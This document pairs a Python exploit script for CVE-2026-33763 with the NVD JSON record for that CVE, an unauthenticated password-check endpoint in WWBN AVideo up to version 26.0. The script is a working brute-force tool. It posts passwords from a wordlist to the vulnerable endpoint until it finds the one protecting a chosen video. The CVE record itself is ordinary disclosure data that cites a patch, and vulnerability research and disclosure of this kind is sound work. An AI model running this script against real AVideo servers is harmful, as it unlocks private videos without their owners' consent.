CVE-2026-33763

import requests # Exploit Title: WWBN AVideo Unauthenticated Video Password Brute Force # Date: 2026-03-27 # CVE: CVE-2026-33763 def brute_force_video_password(target_url, video_id, password_list): """ Attempts to brute force the password for a protected video on AVideo platform. """ endpoint = f"{target_url}/objects/get_api_video_password_is_correct.json" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } print(f"[*] Starting brute force for Video ID: {video_id}") for password in password_list: # Payload construction payload = { "video_id": video_id, "password": password.strip() } try: # Sending POST request to the vulnerable endpoint response = requests.post(endpoint, data=payload, headers=headers, timeout=5) if response.status_code == 200: response_data = response.json() # Analyzing the boolean response if response_data.get("passwordIsCorrect") is True: print(f"[+] SUCCESS! Password found: {password}") return password else: print(f"[-] Failed attempt: {password}") else: print(f"[!] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}") print("[!] Brute force completed, password not found in list.") return None if __name__ == "__main__": # Configuration target = "http://localhost" # Replace with actual target host vid_id = "123" # Replace with valid Video ID wordlist = ["123456", "password", "admin", "12345678", "qwerty", "video"] brute_force_video_password(target, vid_id, wordlist)

{"cve": {"id": "CVE-2026-33763", "sourceIdentifier": "[email protected]", "published": "2026-03-27T15:16:58.390", "lastModified": "2026-03-31T18:44:43.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_password_is_correct` API endpoint allows any unauthenticated user to verify whether a given password is correct for any password-protected video. The endpoint returns a boolean `passwordIsCorrect` field with no rate limiting, CAPTCHA, or authentication requirement, enabling efficient offline-speed brute-force attacks against video passwords. Commit 01a0614fedcdaee47832c0d913a0fb86d8c28135 contains a patch."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/01a0614fedcdaee47832c0d913a0fb86d8c28135", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8prq-2jr2-cm92", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}